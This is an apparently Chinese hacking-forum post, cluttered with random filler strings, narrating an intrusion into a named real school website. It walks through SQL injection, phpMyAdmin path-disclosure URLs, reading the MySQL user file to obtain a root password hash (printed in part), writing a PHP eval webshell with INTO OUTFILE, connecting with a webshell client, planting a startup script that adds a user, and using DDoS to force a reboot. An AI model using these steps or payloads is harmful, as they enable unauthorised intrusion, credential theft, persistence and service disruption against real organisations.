第一眼看去,好像全是html静态的,都知道静态的根本不好日,多点击几个专栏: W+ G* H9 V4 n& X
发现这个:http://www.dyyz.net.cn/celebrate/list.php?id=3 -0 -1 判断后确认存在注入!* @ l; `1 k' n
' z" @: N( {% Q. {
; v4 k1 p. ~+ f4 p) W
0 |" f+ ^( T. z# X0 {, J
常规手工不行,尝试突破也不行,利用穿山甲 可以注入:root权限 - H' I G$ p3 n& Z8 F
( O" y( m5 y; I: l
那么想可以直接写入shell ,getshell有几个条件:$ E5 z S+ n6 ~: h E- d4 {7 T5 V
1、知道站点物理路径 2、有足够大的权限 3、magic_quotes_gpc()=OFF 2 m U8 R% [+ R
1 V- r0 B& o# y7 l& F
试着爆绝对路径: 0 {1 A* l9 e8 i+ h7 y
1./phpMyAdmin/index.php?lang[]=1
) p9 ?6 y! c' A7 v N. o2./phpMyAdmin/phpinfo.php D0 v% t0 X' s( O3 w& `8 t
3./load_file()
' r! A5 H$ A/ |. h* I( }# P3 a0 m4./phpmyadmin/themes/darkblue_orange/layout.inc.php
- K5 d2 m- o3 }7 A# {% E# L) q5./phpmyadmin/libraries/select_lang.lib.php
+ d. Y$ I# ]" L2 H7 j3 P$ N! l6./phpmyadmin/libraries/lect_lang.lib.php
z. c% Z' I8 }4 `# X2 i- D7./phpmyadmin/libraries/mcrypt.lib.php
2 V% s: u+ m! S) F8./phpmyadmin/libraries/export/xls.php
9 u+ I+ W; I6 W) A( ^0 l$ e1 r3 t' A t! B' h, e0 p4 c! ~
均不行........................... 3 j+ L) N) n/ A+ g7 R6 g$ |2 x; ~
- r, o2 H) }( Z+ ~" D御剑扫到这个: http://www.dyyz.net.cn//phpinfo.php 获得网站路径:D:/www/phpinfo.php 8 i3 u5 \5 f% U; d/ \: h# ]- h1 [1 y5 E
- x# @" j& r6 c* m. W
权限为root,知道网站路径,可是条件3不符合,没法写入shell ,不过服务器存在phpmyadmin 8 N$ T* ?/ |. ~* j3 Q5 r
9 x9 W5 p2 |/ G% z2 w: ]/ g
默认不行,尝试万能密码:帐号 'localhost'@'@" 密码空 ,登录失败
* R0 G. h6 B3 d7 k z1 C9 x0 e2 a1 V9 }/ |
敏感东西: http://202.103.49.66/Admincp.php 社工进不去...........
3 P" S' `( X" G3 G) t, B3 z2 s+ i4 Y2 m5 M
想想root还可以读,读到root密码进phpmyadmin 也可以拿shell / c1 G6 h- O! C. `+ m
7 d" `6 T: H U& b+ @5 C
http://www.dyyz.net.cn//phpinfo.php 泄露了D:\phpStudy\PHP5\php.ini 8 L% _1 R. d' l1 P: o9 g, F; |8 I
; @4 O C$ r [' f自己修改好读root密码的路径:D:\phpStudy\MySQL\Data\mysql\user.MYD $ j. T! R3 T8 B" Q. l$ q' J8 M
- ]; O1 Q0 F- r7 @4 m2 S成功读到root密码: 0 P7 }( t! E5 | L' \0 J! t
* n2 t% N& V D- a17---- r(0072)
% w6 o6 Q8 ?2 O* n5 I; ]) `18---- o(006f) # K# P! H- @7 F: U2 p! g$ b7 o
19---- o(006f) ) k! K+ m) e7 m' {+ n% O5 C
20---- t(0074) 5 `8 t5 {+ k- S
21---- *(002a)
8 ?4 k7 A9 |& a8 D* @22---- 8(0038) 6 L# u4 D, ?7 f5 N* C; D- Z
23---- 2(0032) 0 Z- Q3 b0 j8 H3 o
24---- E(0045) ) w) [& n. e# x! J
25---- 1(0031)
! {% G( W! L% M% a8 t& N7 S26---- C(0043)
" Q' F; ^) Y! o1 G6 Y0 W& M27---- 5(0035)
) @, P' t B0 @5 ]! D; v28---- 8(0038)
2 v' p% `- z! Y; p29---- 2(0032) 6 O2 y) g, H8 `
30---- 8(0038)
3 h; V' Z7 p0 m31---- A(0041) 7 }& s. D( T* h- T) j$ [
32---- 9(0039) 8 l: u2 \ k8 d% S/ }3 a
33---- B(0042)
3 Q; ^% o+ }0 t& U6 D- {34---- 5(0035)
" M- r9 V, A* X( v" \& [8 V% e35---- 4(0034) 3 t: I6 h ~ V8 ^' o
36---- 8(0038) 4 P* K( v1 Z7 P7 d, q0 s. R2 s
37---- 6(0036)
7 M1 L0 f4 v2 q3 C# a38---- 4(0034) 2 D5 Z. Z3 P& S3 T i% r1 _2 R
39---- 9(0039)
$ S5 B; z! |) T0 E40---- 1(0031) & s3 v1 A5 V2 d7 ~6 p
41---- 1(0031) * T* D0 t* H/ e9 S: B1 h
42---- 5(0035)
" \+ S; T Q& K& I, M% R/ z; n# J43---- 3(0033)
7 P1 N: o; F2 R; Q44---- 5(0035) 5 y, F" s6 v5 T
45---- 9(0039)
; H8 R* \% j, w6 [46---- 8(0038)
' m; j' H& ^$ o4 V6 P! R3 _7 l4 Y1 T0 D47---- F(0046)
: {$ A3 A4 G+ R48---- F(0046)
) o' D( S% f# Z. J) O0 w: @49---- 4(0034) * X0 G* L2 y6 R h6 y
50---- F(0046)
6 M" o! z% a9 Z" r51---- 0(0030) / r" s- R3 |7 v
52---- 3(0033)
( A) x! [8 b y1 [# H53---- 2(0032)
- I: e N- L p0 a+ p, p54---- A(0041)
9 b9 u: ^( G$ L55---- 4(0034) 7 E' v9 `+ }/ c
56---- A(0041) * J" u6 s! ~8 D, Q8 l( P' J, d
57---- B(0042) ; i! p O( Q& Y4 N- q2 Z- f, ?; E6 E* Z
58---- *(0044) : |1 g- u, I5 j) }
59---- *(0035)
; d; Z7 W- d# z/ q( Q8 }. w60---- *(0041)
( x5 F7 {5 u8 }+ t1 S! e/ k* z61---- *0032)
5 R3 L6 B9 e2 C# I4 X3 n) ^! J& g0 y( y2 z" x& s0 v
解密后成功登陆phpmyamin 0 k5 |; K& U* I8 ]6 m6 B
( S$ k( Q! z8 l; X8 p8 Z' \1 E5 Z4 J( J5 y
- @ z. @* R: p- s4 k- D. { `& ?6 t: m1 M- j
找到mysql数据库,执行sql语句:elect '<?php @eval($_POST[pass]);?>'INTO OUTFILE 'd:/wamp/www/daxia.php'
/ Z- T* B0 j0 P3 y
% X( K: i8 \: I6 ~. m5 X成功执行,拿下shell,菜刀连接:
0 T1 i* f3 O: E+ k3 M: r* d4 Y/ G( k/ g5 c$ H
服务器不支持asp,aspx,php提权无果...................
, D" H! M7 N8 E) g. m! e7 d8 i$ l. e% F Y9 h7 M
但服务器权限很松,上传个远控小马或是一个添加用户的vbs程序到启动里: 3 d# B+ h: @% n9 r" n: R
服务器上已经有个隐藏帐号了 9 C( c% ?# C. a g7 u
别名 administrators2 ?' E* l9 F# _
注释 管理员对计算机/域有不受限制的完全访问权 $ g9 B- t( Y6 I R7 Y+ D1 `
成员
, ^- \+ D8 V/ u2 t-------------------------------------------------------------------------------* z7 z0 \9 l# e- t5 K; m
admin+ I1 k5 @( Q3 e5 u
Administrator* w, z0 G$ V9 |4 s
slipper$
8 G- G6 P. C2 ^& G( e1 U1 msqluser
6 U$ i- m) V9 i/ e# N5 O9 N命令成功完成。
0 e8 x- n* ` h" W( E3 n5 b1 k/ z' o. _1 C8 W: K1 Z5 P0 c5 Q5 f
服务器权限很松,上传个vbs添加用户的到启动,不要用bat,会开机的时候显示运行批处理的。" R$ e/ d# x) t: B3 ?
3 ^- K& e) v# P) O* Wddos服务器重启,不然就只能坐等服务器重启了...............................
. p' d# d6 L% ]2 d! \
& Q5 `# W+ F$ R7 y+ l; ?( V9 e, `9 N & g% I" U2 l; c. g% U, h
|